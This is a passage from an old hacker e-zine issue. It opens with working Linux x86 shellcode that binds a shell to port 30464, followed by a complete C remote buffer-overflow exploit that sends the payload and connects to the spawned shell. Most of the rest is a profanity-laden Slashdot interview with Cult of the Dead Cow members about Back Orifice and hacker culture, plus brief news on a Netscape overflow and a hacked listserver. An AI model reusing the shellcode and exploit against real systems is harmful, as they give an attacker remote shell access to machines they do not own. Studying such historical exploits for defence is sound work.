%eax,0x4(%esi) */ "\x31\xc0" /* xorl %eax,%eax */ "\x89\x46\x10" /* movl %eax,0x10(%esi) */ "\xb0\x10" /* movb $0x10,%al */ "\x89\x46\x08" /* movl %eax,0x8(%esi) */ "\xb0\x66" /* movb $0x66,%al */ "\xb3\x02" /* movb $0x2,%bl */ "\xcd\x80" /* int $0x80 */ "\xeb\x04" /* jmp 0x4 */ "\xeb\x55" /* jmp 0x55 */ "\xeb\x5b" /* jmp 0x5b */ "\xb0\x01" /* movb $0x1,%al */ "\x89\x46\x04" /* movl %eax,0x4(%esi) */ "\xb0\x66" /* movb $0x66,%al */ "\xb3\x04" /* movb $0x4,%bl */ "\xcd\x80" /* int $0x80 */ "\x31\xc0" /* xorl %eax,%eax */ "\x89\x46\x04" /* movl %eax,0x4(%esi) */ "\x89\x46\x08" /* movl %eax,0x8(%esi) */ "\xb0\x66" /* movb $0x66,%al */ "\xb3\x05" /* movb $0x5,%bl */ "\xcd\x80" /* int $0x80 */ "\x88\xc3" /* movb %al,%bl */ "\xb0\x3f" /* movb $0x3f,%al */ "\x31\xc9" /* xorl %ecx,%ecx */ "\xcd\x80" /* int $0x80 */ "\xb0\x3f" /* movb $0x3f,%al */ "\xb1\x01" /* movb $0x1,%cl */ "\xcd\x80" /* int $0x80 */ "\xb0\x3f" /* movb $0x3f,%al */ "\xb1\x02" /* movb $0x2,%cl */ "\xcd\x80" /* int $0x80 */ "\xb8\x2f\x62\x69\x6e" /* movl $0x6e69622f,%eax */ /* %eax="/bin" */ "\x89\x06" /* movl %eax,(%esi) */ "\xb8\x2f\x73\x68\x2f" /* movl $0x2f68732f,%eax */ /* %eax="/sh/" */ "\x89\x46\x04" /* movl %eax,0x4(%esi) */ "\x31\xc0" /* xorl %eax,%eax */ "\x88\x46\x07" /* movb %al,0x7(%esi) */ "\x89\x76\x08" /* movl %esi,0x8(%esi) */ "\x89\x46\x0c" /* movl %eax,0xc(%esi) */ "\xb0\x0b" /* movb $0xb,%al */ "\x89\xf3" /* movl %esi,%ebx */ "\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */ "\x8d\x56\x0c" /* leal 0xc(%esi),%edx */ "\xcd\x80" /* int $0x80 */ "\x31\xc0" /* xorl %eax,%eax */ "\xb0\x01" /* movb $0x1,%al */ "\x31\xdb" /* xorl %ebx,%ebx */ "\xcd\x80" /* int $0x80 */ "\xe8\x5b\xff\xff\xff"; /* call -0xa5 */ ---------------------------------------------------------------------------- 6.4 Exploit vulnerable4 program With this shellcode, you can make an exploit code easily. And You have to make code which connects to the socket. exploit4.c ---------------------------------------------------------------------------- #include #include #include #include #include #define ALIGN 0 #define OFFSET 0 #define RET_POSITION 1024 #define RANGE 20 #define NOP 0x90 char shellcode[]= "\x31\xc0" /* xorl %eax,%eax */ "\xb0\x02" /* movb $0x2,%al */ "\xcd\x80" /* int $0x80 */ "\x85\xc0" /* testl %eax,%eax */ "\x75\x43" /* jne 0x43 */ "\xeb\x43" /* jmp 0x43 */ "\x5e" /* popl %esi */ "\x31\xc0" /* xorl %eax,%eax */ "\x31\xdb" /* xorl %ebx,%ebx */ "\x89\xf1" /* movl %esi,%ecx */ "\xb0\x02" /* movb $0x2,%al */ "\x89\x06" /* movl %eax,(%esi) */ "\xb0\x01" /* movb $0x1,%al */ "\x89\x46\x04" /* movl %eax,0x4(%esi) */ "\xb0\x06" /* movb $0x6,%al */ "\x89\x46\x08" /* movl %eax,0x8(%esi) */ "\xb0\x66" /* movb $0x66,%al */ "\xb3\x01" /* movb $0x1,%bl */ "\xcd\x80" /* int $0x80 */ "\x89\x06" /* movl %eax,(%esi) */ "\xb0\x02" /* movb $0x2,%al */ "\x66\x89\x46\x0c" /* movw %ax,0xc(%esi) */ "\xb0\x77" /* movb $0x77,%al */ "\x66\x89\x46\x0e" /* movw %ax,0xe(%esi) */ "\x8d\x46\x0c" /* leal 0xc(%esi),%eax */ "\x89\x46\x04" /* movl %eax,0x4(%esi) */ "\x31\xc0" /* xorl %eax,%eax */ "\x89\x46\x10" /* movl %eax,0x10(%esi) */ "\xb0\x10" /* movb $0x10,%al */ "\x89\x46\x08" /* movl %eax,0x8(%esi) */ "\xb0\x66" /* movb $0x66,%al */ "\xb3\x02" /* movb $0x2,%bl */ "\xcd\x80" /* int $0x80 */ "\xeb\x04" /* jmp 0x4 */ "\xeb\x55" /* jmp 0x55 */ "\xeb\x5b" /* jmp 0x5b */ "\xb0\x01" /* movb $0x1,%al */ "\x89\x46\x04" /* movl %eax,0x4(%esi) */ "\xb0\x66" /* movb $0x66,%al */ "\xb3\x04" /* movb $0x4,%bl */ "\xcd\x80" /* int $0x80 */ "\x31\xc0" /* xorl %eax,%eax */ "\x89\x46\x04" /* movl %eax,0x4(%esi) */ "\x89\x46\x08" /* movl %eax,0x8(%esi) */ "\xb0\x66" /* movb $0x66,%al */ "\xb3\x05" /* movb $0x5,%bl */ "\xcd\x80" /* int $0x80 */ "\x88\xc3" /* movb %al,%bl */ "\xb0\x3f" /* movb $0x3f,%al */ "\x31\xc9" /* xorl %ecx,%ecx */ "\xcd\x80" /* int $0x80 */ "\xb0\x3f" /* movb $0x3f,%al */ "\xb1\x01" /* movb $0x1,%cl */ "\xcd\x80" /* int $0x80 */ "\xb0\x3f" /* movb $0x3f,%al */ "\xb1\x02" /* movb $0x2,%cl */ "\xcd\x80" /* int $0x80 */ "\xb8\x2f\x62\x69\x6e" /* movl $0x6e69622f,%eax */ "\x89\x06" /* movl %eax,(%esi) */ "\xb8\x2f\x73\x68\x2f" /* movl $0x2f68732f,%eax */ "\x89\x46\x04" /* movl %eax,0x4(%esi) */ "\x31\xc0" /* xorl %eax,%eax */ "\x88\x46\x07" /* movb %al,0x7(%esi) */ "\x89\x76\x08" /* movl %esi,0x8(%esi) */ "\x89\x46\x0c" /* movl %eax,0xc(%esi) */ "\xb0\x0b" /* movb $0xb,%al */ "\x89\xf3" /* movl %esi,%ebx */ "\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */ "\x8d\x56\x0c" /* leal 0xc(%esi),%edx */ "\xcd\x80" /* int $0x80 */ "\x31\xc0" /* xorl %eax,%eax */ "\xb0\x01" /* movb $0x1,%al */ "\x31\xdb" /* xorl %ebx,%ebx */ "\xcd\x80" /* int $0x80 */ "\xe8\x5b\xff\xff\xff"; /* call -0xa5 */ unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } long getip(char *name) { struct hostent *hp; long ip; if((ip=inet_addr(name))==-1) { if((hp=gethostbyname(name))==NULL) { fprintf(stderr,"Can't resolve host.\n"); exit(0); } memcpy(&ip,(hp->h_addr),4); } return ip; } int exec_sh(int sockfd) { char snd[4096],rcv[4096]; fd_set rset; while(1) { FD_ZERO(&rset); FD_SET(fileno(stdin),&rset); FD_SET(sockfd,&rset); select(255,&rset,NULL,NULL,NULL); if(FD_ISSET(fileno(stdin),&rset)) { memset(snd,0,sizeof(snd)); fgets(snd,sizeof(snd),stdin); write(sockfd,snd,strlen(snd)); } if(FD_ISSET(sockfd,&rset)) { memset(rcv,0,sizeof(rcv)); if(read(sockfd,rcv,sizeof(rcv))<=0) exit(0); fputs(rcv,stdout); } } } int connect_sh(long ip) { int sockfd,i; struct sockaddr_in sin; printf("Connect to the shell\n"); fflush(stdout); memset(&sin,0,sizeof(sin)); sin.sin_family=AF_INET; sin.sin_port=htons(30464); sin.sin_addr.s_addr=ip; if((sockfd=socket(AF_INET,SOCK_STREAM,0))<0) { printf("Can't create socket\n"); exit(0); } if(connect(sockfd,(struct sockaddr *)&sin,sizeof(sin))<0) { printf("Can't connect to the shell\n"); exit(0); } return sockfd; } void main(int argc,char **argv) { char buff[RET_POSITION+RANGE+ALIGN+1],*ptr; long addr; unsigned long sp; int offset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1; int i; int sockfd; if(argc>1) offset=atoi(argv[1]); sp=get_sp(); addr=sp-offset; for(i=0;i>8; buff[i+ALIGN+2]=(addr&0x00ff0000)>>16; buff[i+ALIGN+3]=(addr&0xff000000)>>24; } for(i=0;i If it's from MS, the security is crap. everything else is better by comparison. Linux is pretty good if you're a Linux guru. Same thing with any other flavor of UNIX. But no matter how good you are, there's someone out there who is better than you. "The price of secure connectivity is eternal vigilance!" -- DilDog answers: Windows95 / 98 - Shit happens Commercial Unix - Shit happens over RPC. Linux - When shit happens, you fix it. FreeBSD - Shit would happen, but there's no driver for it yet. NT - Shit wouldn't happen if you'd just spend a few months performing 300+ modifications to our default installation, you lazy sysadmin. Get your MCSE. Windows 2000 (NT5) - Shit happens over DCOM. -- Tweety Fish answers: Except for Window95/98, which I would characterize as sucking ass across the board, there's no simple answer to that question. All of those operating systems are (resonably) securable, in theory, but if you want to make the job of securing a box easier, why not run OpenBSD? xmedar asks: There is an episode of South Park with cows worshipping a cow clock, and when it is removed by the people, the cows all jump off a cliff, now I've heard that refered to as the Cult of the Dead Cow episode, is it anything to do with cDc or are cults for dead cows just in fashion right now? cDc answers: Obscure Images answers: We would like to believe that we were inspirational to the creators of South Park, but we will defer to the obviously natural call of bovinity. -- Reid Fleming answers: Our lawyers will not permit us to comment upon the episode in question. -- G. Ratte' answers: Sure. I hear the next round of Calvin Klein ads will feature Kate Moss munching a big greasy cheeseburger as Kari Wuhrer cleaves an axe through a cow's head. And a roomful of Italian boys with no chest hair look on in quiet desperation. It's a scene straight from one of our industry convention parties. -- Nighstalker answers: The universe is a chaotic system. If Ratte had been screwing around in a sewage treatment plant, rather than an abandoned slaughterhouse, we cound have been called the Cult of Recycled Shit. That the guys from South Park had cult of suicidal cows may be our fault. maybe not. -- Tequila Willy answers: I know this episode well, and I've spent a lot of time studying the various interpretations of this episode. Though the Cult of the Dead Cow interpretation is a very plausible and popular connection to make, there is another very plausible interpretation that I think you will find interesting. The hands on the clock are metaphors for the phallus. The removal of the clock represents castration. The removal of the phallus limits sexual options and limited options are bad. The cows demonstrate their adherence to their principle of "maximum freedom or death" by jumping off the cliff. You might ask yourself, xmedar, whether you have any principles that you would be willing to die for. -- Tweety Fish answers: TV writers (comedy writers especially) tend to be unrepentant fanboys with computers and tight deadlines... you decide. Effugas asks: To the various illustrious(translation: I've worshipped you guys for the majority of my life) members of the Cult of the Dead Cow: Moo. That being said, I'd like to know what have been the most surprising events in the computer industry for you. Anything's fair game. What just came out of nowhere and knocked the Cult flat on its ass? cDc answers: Obscure Images answers: We haven't been knocked on our asses yet by anything that has happened in the computer industry. We're great at believing that whatever we see is directly caused by our underground efforts. We would be knocked on our ass if we didn't believe that. Oh yeah, Linus Torvalds is a cDc simulacra unit. -- Reid Fleming answers: www.realdoll.com www.jerkcity.com -- GA Ellsworth answers: http://www2.promisekeepers.org/ -- G. Ratte' answers: I'm mostly surprised by what hasn't happened. I thought floppy disks would get bigger and bigger 'til they became a 3-foot square, and you'd use 'em for kites when they went bad. I thought for sure bubble memory was going to take off, and pen-based OSes would rule the industry, and I'd have an Amiga clipboard computer running MS's BOB right now. It should have been Atari, not Microsoft. -- Nighstalker answers: Cheap powerful computers. Looking at the list prices of all my Commodore 128 gear shows me that the whole system cost more than a new iMac. Also, PDAs are pretty surprising, how they just suddenly seem to be everywhere. -- White Knight answers: What surprised me most about the computer industry is how much less attractive Kiki Stockhammer is in person. -- Tweety Fish answers: You know they got these things now that can take a picture and put it on the screen thingy? That's so cool! sinatra asks: A recent article (forgot the reference) characterized codc members as a bunch of social juveniles bound by no particular ideals, and lacking in both trust and personal respect for other members as well as the (cr|h)acker communities at-large. The evidence presented in the article however was limited to on-stage behavior and a virus of unknown-but-suspicious origin on a distributed CD. The codc archives paint an equally murky picture, depending on the reader's perspective. So is there a codc code of ethics? Could such a thing ever be enforced? cDc answers: Obscure Images answers: I can't answer for everyone, but I will say that I am a moral relativist. I think that the morality of an act is dependent on the context of that action. As for a cDc as a group, we are a very close knit group, very nearly a family, and to think that there would be someone amongst us who would turn on us is an absurdity. The article in question was written by a well known fool who would fit in better at a meeting of the John Birch S ociety than a computer convention. -- Reid Fleming answers: No and no. -- G. Ratte' answers: Lacking in trust and personal respect? I wish I knew the article you're referring to, 'cause those are some pretty strange assumptions. But that's funny, that's interesting. We're the kids the newspapers used to write about being diagnosed with "Pac-Man elbow." We're the kids with the sore thumbs from Atari joysticks playing "Combat" through our adolescence. We're the first generation to grow up hearing a modem squeal every day after school. So if there's any lack of trust and respect for the (cr/h)acker community, it's self-loathing and it's all in the family. Familiarity breeds contempt. The only ethic is to not be, uh, k-lame. Spreading viruses is not good. -- Nighstalker answers: I read that article. The author is an ignorant twat. For what it's worth, I trust my very life with any cDc member. I trust them implicitly. I suspect that cDc individually and as a group is far more ethical than Microsoft. Anyone emails me, they get an answer directly from me, not some flack from marketing. -- Tequila Willy answers: Dear Sinatra, Who's codc? I've never heard of them. -- Tweety Fish answers: The nice thing about cDc is we're all cool enough, and all moral enough, that there really is no need for us to enforce much of anything. Personally, I'm constantly entertained by everything every other cDc member ever does, and I'd much rather have that than the 1700 page cDc Moral Guide. Incidentally, the author of that article also thinks that Richard Stallman should be arrested and charged with monopolistic practices, so, you know, you shouldn't believe everything you read. [bog-oh] asks: You folks have been around for so long, surely you've seen the evolution of both terms. Are you quick to take a stand on misuse of either, or do you just take it all in stride? Some of the older security folks out there are damned sure that "hacking" is still purely malicious, and "Cracking" simply means breaking software registrations and the like. What do you feel each term represents these days? cDc answers: Obscure Images answers: We would like to take a stand on this nonsense once and for all. We are of the firm opinon that the qualification for being a hacker is not something that can be stated on clear moral grounds. As far as we are concerned, crackers are something you eat. -- Reid Fleming answers: The term "cracker" is divisive, insulting, and should be considered inappropriate in mixed company. Same for "honky" and "caucasian". "Hacker" on the other hand, is perfectly fine for most social situations. A As in: "Hey, you! Hacker! Suck my dick!" -- G. Ratte' answers: Personally, I never use the term "hacking"... it's all just messing around to me, and some of it could get you into trouble. Whatever. "Cracking" means removing software protection, and a "cracker" is a white boy. I don't know when people starting fussing over the terms and using "cracking" to mean system intrusions, but I think it all carries the stench of journalist-invented nonsense. Same with all that "white/black hat" crap. Nobody in this situation uses those terms, and they readily identify the user as an outsider. -- Tequila Willy answers: Dear Bog-Oh, Your sensitivity is to be applauded in these times largely characterized by egocentric thinking. I appreciate that you've taken the time to ask me what I *feel* about these terms. I feel good about what each term represents. Thank you for asking. -- Tweety Fish answers: A cracker is somebody who cracks warez, and/or a pejorative term for a white person. Any other meaning is never going to catch on in the media, nor with the old school. It's just too complicated to remember the distinction all the time. The people who are hackers by anybody's definition have done some... uh... mischevious things in their time; it's part of the nature of the beast. To say that "a real hacker would never break into a computer system" indicates - to me - a lack of understanding of the original meaning of the word. Of course a real hacker would break into a computer system, if it was an interesting enough problem and they didn't anticipate anybody having a problem with it. I agree that the media should widen it's definition of what a hacker is, but that's not the argument I usually see, especially here on slashdot. I see a lot more of "they aren't a real hacker, because they break into systems and/or do security stuff", which is plain silly. Personally, I refer to people by whatever term they would like me to use, unless I don't like them. Besides which, if you are doing something unexpected, unforseen, or disallowed to any system (which is my pocket definition of hacking) somebody is always going to think it's bad, until you laboriously convince them otherwise, on a case by case basis. Why get caught up in semantic arguments when you could be doing cool things and get noticed for THAT, instead? phray01 asks: please be honest (1)boxers (2)briefs (3)panties (4)thongs (5)nothing (6)orange (7)Hemos the Hamster cDc answers: Obscure Images answers: All of the above, though not necessarily at the same time. -- Reid Fleming answers: sacred vestments -- GA Ellsworth answers: Boxers for me.. -- G. Ratte' answers: I refuse to answer this question, as I don't want to encourage your gross masturbatory fantasies. What I choose to cover my massive, pulsating tool swinging handily between my taut legs is my business, and my business only. What should the touch of soft fabric brushing the tender head of my otherwise steely rod matter to the likes of you? Disgusting! -- Nighstalker answers: Sheer to the waist black seamed pantyhose for formal affairs. -- DilDog answers: All of the above. -- Tequila Willy answers: Dear phray01, The etiquette in this case actually depends upon whether you were east or west of the Mississippi when this unfortunate accident occurred. East of the Mississippi, the gas station attendant should remove the dog's head from your windshield wipers when cleaning the windshield. However, please be prepared to tip for this service. West of the Mississippi, it is usually considered bad manners to expect gas station attendants to remove any animal bits that have been wedged in your car parts. Thank you for asking. -- Tweety Fish answers: I actually try not to wear any slashdot operators that close to my skin. Makes my pants look funny. Foogle asks: Let's face it - most people regard the cdc as a bunch of script-kiddies looking for some limelight. The BackOrifice software really made this worse, because it was seen, not as an admin tool, but as an application meant to propogate cracking. How does this make you feel? That is, what are your personal thoughts on the cult's activities and how do you think they should be viewed from the professional side of the industry? cDc answers: Obscure Images answers: cDc is not a group of script kiddies. We are united in our interest to hack the world, be it though computers, words, images, sounds, politics, money, or sex. Those who consider us to be script kiddies ought to shut the fuck up and write their own tools. Using tools doesn't make someone a script kiddie, what makes a script kiddie is the use of other people's tools to accomplish things they have no interest in understanding. It is understandable for professionals to be concerned with our reputations, but that is why we've been completely open with our tools. We have software that can be used as very effective tools. -- Reid Fleming answers: Most professionals get it. The trojan horse problem was considered to be low priority a year ago. Things have changed as a direct result of Back Orifice and Netbus. (By the way, you ever notice that sometimes journalists turn to Russ Cooper for an "independent" perspective on Microsoft? And you ever notice how often he agrees with the Microsoft position?) -- G. Ratte' answers: It's somewhat frustrating when something a lot of effort has gone into is totally misunderstood by so many people. A lot of people seem to have an aversion to the big picture and how BO fits into a larger whole. As for 'the industry,' . Rah rah venture capital, rah rah IPO. "We've got this great new site, Hats4Cats.com, a brave new world of headgear for our feline friends! We're seeking the perfect partners to get this off the ground right, and if you'll just look over this media kit at your leisure after the convention, we'll have someone call you in the next few days about some great opportunities!" That's 'the industry.' 'The industry' can kiss our collective cDc ass. -- Nighstalker answers: Most people couldn't plug in new RAM to their machines or install an application with the aid of an installation wizard. More so for the people that write about the digital underground who are not a part of the digital underground. BO was released to show up the miserable security of Windows, in the hope that MS would do something other than issue press releases and that users would be made aware of the pitiful security on their machines, particularly when connected to the Internet. BO2K was released in response to the pleas of countless IT professionals who needed a powerful admin tool. -- DilDog answers: I don't feel one way or the other about it. I write code to fill a void whenever I find I need something that doesn't exist. Hence, BO2K. What Linux is to Commercial Unix, BO2K is to Commercial remote admin tools. I mean, what kind of sick and twisted hax0r would want to use FREE and POWERFUL software without having to pay out of their ass for it. -- Tequila Willy answers: Dear Foogle, Thank you for being concerned about my feelings. However, I disagree with the metaphysical assumptions of your first question. I believe I choose how I feel and that the reaction of "most people" cannot make me feel any particular way. That being said, your second question seems more appropriate. The Cult of the Dead Cow should be viewed as what they are, namely, experts in global domination. -- Tweety Fish answers: So the technical definition of Script Kiddie is one who uses pre-made scripts or tools to hack sites, instead of developing their own tools.. by that definition, how could we possibly be script kiddies? In the larger sense of BO2K being an application meant to propagate cracking, yes, that might happen, but the way we're doing it does serious work to raise awareness of these issues. I think we're perfectly aware that this can be hard to understand, and we're perfectly willing to keep hammering our message home until people start to get it, and start working to fix these problems. An_onymous Coward asks: First of all I've got to say I think cdc is pretty damn cool. I was digging their .txts since I got my first dialup shell account long ago. Now, with you guys being so security minded and all, there's only one question I could think of for you: If you were to build your ideal network, with telnet, ssh, www, ftp, pop3, smtp, file & printer sharing, bind, etc... what would be your ideal configuration to maximize security? Please be specific about Network OSs, routers, network policies, protocols, filesystems, permissions, daemons, firewall rules, and anything else that comes to mind. cDc answers: Reid Fleming answers: Dedicated fiber lines in a star configuration. Ultra low tramissions, only a few quanta, to foil optical taps. One-time pad encryption for each packet. All plaintext messages composed in an alien language unknown to anyone but the participants. The actual content of the messages being hidden in subliminal channels too sensitive to be mentioned here. -- DilDog answers: For cryin' out loud. My ideal network doesn't have half of that crap running. It can all be done with DCOM and HTTP. Just kidding! I -know- this is a Linux crowd, but I'm tellin' ya, take a look at OpenBSD for PROACTIVE security when it comes to that mission critical firewall box, network monitor, webserver, etc. -- Tequila Willy answers: Dear Anonymous Coward, First, thank you for your compliments. However I am left wondering how many of our text files you have actually read. All of your questions have already been addressed in detail in our text file, Wet Mount Slide. -- Tweety Fish answers: DUD3 Y3R TRY1N T0 B3 4LL SN34KY 4N' S0C1AL 3N1N33R US AN' SH1T A1N'T Y000? B3TT3R US3 NM4P INST3D!@$#!@% If you want a genuine answer to that question, I'm sure the l0pht would be able to answer it as specifically as you need for a small fee. Freshman asks: Since BO is/was a big deal, I'm wondering what kind of companies have tried to contact you and what they had to say. Did Microsoft ever give you guys a buzz? The DoD maybe? CIA? If so, what did they have to say? cDc answers: Tweety Fish answers: We've been in constant communication with the CIA, NSA, and MOSSAD to make sure that the government-specific backdoors built into BO2K meet their tough standards for EoE (Ease of Eavesdropping).. we value the contributions the US and other governments have made to these products, and look forward to working much much more with them in the future. Microsoft hates us, I think. rikek asks: I've always wondered... what does a group that produces "script kiddie material" (no offense intended, it's inevitable whether you want it or not) feel about their work? Every now and then I'm plagued by contact with an "3R33+ H@X0R", who is most likely some 14 year old without anything better to do who is causing some minor damage, without a clue as to what a TCP/IP packet is. The ratio of clueful hackers cracking to script kiddies cracking has gone way down over the few years, and products like BO are likely to blame. So what do you guys think about this... would you rather this turned around, or do you feel that distributing tools to nameless masses is a good method at getting back at the real evils? cDc answers: Obscure Images answers: There will always be people who ride on the work of others. That's all that script kiddies are, poseurs, trendies or what have you. Back in the old days after War Games came out there were floods of "hackers" out there and these same comments were made. In the end, there is always a shakeout process. Most of the current script kiddies will abandon their activities, leaving the hardcore still in place. -- Reid Fleming answers: I suggest reading the section on Evolutionarily Stable Strategies in The Selfish Gene. -- G. Ratte' answers: It's tricky, and I refuse to get into the kind of age/experience penis-size wars that always come up with this "lamers are running around with dangerous scripts" thing. Back Orifice is distributed the way it is to force an issue. A hell of a of people should be upset their computers are wide open. I've always hoped that people interested in our tools would seek out our other material and read up on what we're about. And that they'd be smart enough to figure out that bumming some hapless person's day by screwing up their computer is not a good way to spend an afternoon. The end of all our text files from the last few years says this: "Save yourself, go outside, DO SOMETHING!" -- Nighstalker answers: Virtually anything can be used for evil, as virtually anything can be used for good. One thing about BO2K is that the author deliberatly made it more difficult for clueless script kiddies to use. They're the ones who constantly plague us with badly mis-spelled complaints about how BO2K doesn't work. The IT professionals sing our praises about the power and ease of use of BO2K. BO2K is forcing evolution to accelerate in the world of computer security. we regret the damage that is done with BO2K. In the long run, we will all be the better for this. -- Tequila Willy answers: I think you have raised an excellent question. However, I am doubtful that good products like BO can be identified as the cause of the diminishing number of hackers in comparison the the number of script kiddies. I believe that each individual must take responsibility for the character traits that they choose to cultivate in themselves. If the number of script kiddies continues to grow and more individuals choose to take the path of becoming a script kiddie rather than pursuing hacking skills, then this seems more plausibly interpreted as a sign of laziness or a short attention span on the part of those who choose this path. I don't think that BO could be blamed for such a result. That being said, I would prefer to see more hackers than script kiddies but only because I respect the skills of hackers more than the skills of script kiddies. And I would rather participate in a society populated by individuals I can respect. However, I believe your question should lead us to thinking more about what sort of behaviors should or should not be tolerated in cyberspace. And before we can address that question, it would first be helpful to conduct an inquiry into the metaphysics of hacking. I believe that many of the laws regarding computer security issues are misguided because they make fundamental assumptions about the nature of the computer hacking environment that simply are erroneous. -- Tweety Fish answers: The ratio might have changed, but the total number of people with a clue has increased, not decreased. Some 14 year old might get their start by messing with bo2k at school, and then they might start writing plugins, and then they might need to do something stranger, so they'll mod netcat to do suit their needs, and then they might realize how horribly insecure their own system is, and install linux or freeBSD to mitigate that somewhat, and then they might get out of school and go get a job securing corporate networks with all the knowledge they've gained. Kids will be kids. If computer security was a real priority for operating system vendors, Joe Random 14 year old would need a lot more than something as general purpose as BO2K to start trouble. He'd need... uh... a car, say, or some bleach and ammonia, or a lot of beer. yoshi asks: What should application and OS designers do to build systems which are more secure? cDc answers: Reid Fleming answers: For starters, they should spend more time and energy on security than UI design, documentation, or product packaging. -- Nighstalker answers: Learn from the mistakes of the past and the solutions of today. It's not that hard to impliment security. It's just easier for lazy coders and indifferent beancounters to blow it off by saying that, "This is not something our customers are demanding in our product." -- Dildog answers: Proactive security measures. Encrypt everything. Eliminate HTTP and go right to HTTPS everywhere. -- Tweety Fish answers: Make security concerns and security audits an integral part of the development. Alpha42 asks: Okay.. Here's my question.. what ever happened to Obscure Images?! I haven't seen anything from him in AGES... Don't get me wrong, I thought BO was good and all, and I'm sure it's generated 99% of the PR lately.. but I miss the original cDc stuff.. the files! :) And Obscure?! OH man... cDc answers: Obscure Images answers: Hey, I'm still here, and I am as active as I have ever been. I've never been gone, just acting back in the shadows. I do what I can to help plan and implement our projects. Most of it comes without the glory or press attention, but it has to be done for us to be successful. Over the past 10 years I've gone to school, gone out into the world, gotten married, and started to go a bit grey. Not related to my marriage, I assure you. There will be more files from me, it's just a matter of finishing them. Keep your eyes open, your mouths too. As far as my poetry goes, I have an excuse. It was 10 years ago, I was a typical late teen with clinical depression and the idea that I could write poetry. I stand by my stories, but would rather see the poems fade away like my youth. Oh yeah, you have seen me, everytime you see our Paramedia Cross logo. -- Tweety Fish answers: Near the end of the cold war, Obscure Images was captured by a splinter faction of the KGB, and forced to write polemics, in verse, in a futile attempt to turn the people of the former Soviet Union back on the true path to communism. He's back now, and doing fine, except for that twitch. Effugas asks: What tools, in your minds, would you consider the most useful but least acknowledged tool in your security analysis collection? When backed into a corner, unsure how to whip something into shape, what obscure and strange network(or even non-network!) utility popped into mind and either performed some amazing function you couldn't imagine coding yourself or gave you the necessary cluephone ringing (via source code peek) to pull it off yourself? cDc answers: DilDog answers: lsof. Use it. Anonymous Coward asks: My question is simple: When will you start to do productive things ? Ok, here is some context for the question. I know about BO2K ; and saw miscellaneous software at cDc site. But on the other hand, the cDc has existed much longer than Linux itself, the FreeBSD team, NetBSD, and for probably as long as the FSF itself. One one hand you have a wealth of software (for instance here or here), on the other hand, after 15 years, you have a handful of cracking tools, one Windows administration package, an unorganized set of information, and stickers + temporary tatoos for sale. In particular, it is a total mystery why since all that time, you haven't done one of the following: Review, summarize existing security systems, document and implement a robust security model. Unix model is total crap ; even Multics (design: 1963) was better (Multics achieved B2 security rating). Audit publically a freely available Unix (today done by OpenBSD instead). Write automatic assembly code analyzer to search for bugs (or at least for C). Commercial tools exist by now, and last time I tried to see if a free one existed, all I could found on cDc site was a "Tao of Windows Buffer Overflow" (a re-hash of techniques found for instance in Morris' Internet Worm in 1988. See Spafford's excellent report, and the Worm's FAQ). Lent a bunch of your machines, to hold contests such as "the best security model for Linux/BSD, running almost all possible services/servers, CGI, ...". In this context, when will you stop selling temporary tatoos, and start real programming (other than BO2K)? cDc answers: Obscure Images answers: While cDc does some programming, this is not the sole focus of our efforts. To compare us to the other groups you mention you have to realize that we have different goals, as well as methods. We don't feel obligated to do anything for anyone. Our work is directed by our desires and our goals, not the desires of the community. Everything we do is productive in our eyes. We like to think that we've done work every bit as important as any of the above groups. It's all a matter of perspective. We have no problem with the people who have given their time and energy to these other projects, but we are not like them. We do things when we want to, in the way that we want to. -- Reid Fleming answers: Temporary tattoos are a CRITICAL ELEMENT of our security strategy. To suggest otherwise is sheer lunacy. -- G. Ratte' answers: Wow. I don't know when I'm going to be productive. Mom wants grandkids, too. Why should we do those things? Maybe we will, maybe we won't. Why don't you? We do other things. As far as "lend a bunch of your machines to hold contests..." that's funny, what bunch of machines? None of us are wealthy. You looked at our site and blew it off as a "handful of cracking tools & an unorganized bunch of information." That's the first electronic magazine ever, starting in 1984. It was a big deal to me when I was fourteen and bored in a small town, and I was doing something new and exciting and fun. I don't necessarily want to satisfy your weird little computer fetishes. I've got a dog and a cat and a screwy relationship and my picture in SPIN and no job and I'm busy. Too busy for you. To quote from cDc #300: THE POINT by Bryan O'Sullivan you could spend an hour counting the petals in a flower it might take you a year to count the veins in each petal if you spent ten lifetimes, maybe you could count its cells but you'd have completely missed the point you fuckhead -- Nighstalker answers: And this comes back to my first answer. cDc is NOT ABOUT PROGRAMMING! Programming and computers are only a means to an end. -- Tequila Willy answers: Dear Anonymous Coward, Your question seems very serious and as such seems to be counter productive. The Cult of the Dead Cow exemplifies the very attitude that ought to be cultivated considering the absurd nature of existence. Take a moment to contemplate your death and your own concerns about what counts as productive behavior may shift. You may think to yourself, "I am merely a mortal who will die, but I must live responsibility for the sake of those who will survive me." But of course your friends and family will die and there will come a time when no one alive will even have a memory of your existence. And if that weren't enough, at some point our own Sun will supernova, and when this occurs, human life on earth will be destroyed. At that point, human beings will not even exist to contemplate the fates of those like yourself who died long ago. From this perspective, all human actions seem to take on an equal importance: our concerns are absurd! To live freely and responsibility, a mature human being must realize this point. Having fun, living and loving well, being playful (and hence flexible in your living): these actions take on much greater importance than behaving in a serious (and hence rigid) manner. Your question is foolish because it is not asked with a foolish spirit. -- Tweety Fish answers: Read our files. Read our press releases. It's all about style, jackass. Incidentally, the first of your suggestions is a primary goal of the OpenBSD project, like you said. The second suggestion is a fine idea, why don't you do it? (re: spafford's paper and the internet worm, the internet worm didn't run on win32, now, did it?). As for the third suggestion, gee, that's a great idea. Why don't we kick down a couple hundred thousand for a semi-trailer we can turn into the cDc hackmobile, and load it up with all these high-end systems we have sitting around, and hire somebody to drive it around the country so people can mess with it for free! We do what we're interested in, what's fun, and what's within our resources, plain and simple. And we try to keep it funny. Descriptions of who these people are are at http://www.cultdeadcow.com/members/. @HWA 48.0 Buffer Overflow in Communicator May Allow Code to Run ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond Another buffer overflow in the Windows version of Netscape Communicator has been discovered. This one deals with incorrect bounds-checking in dynamic font support. Example exploit code is available and confirms the overflow on NT 4.0 using Netscape 4.61 and 4.7. It should be possible use this exploit to execute arbitrary code. White Hats http://www.whitehats.com/browsers/maxvisioncrash47/index.html @HWA 49.0 Listserver hacked ~~~~~~~~~~~~~~~~~ From http://www.403-security.org/ http://www.it.fairfax.com.au/breaking/19991021/A1636-1999Oct21.html Update: Evidence points to listserver 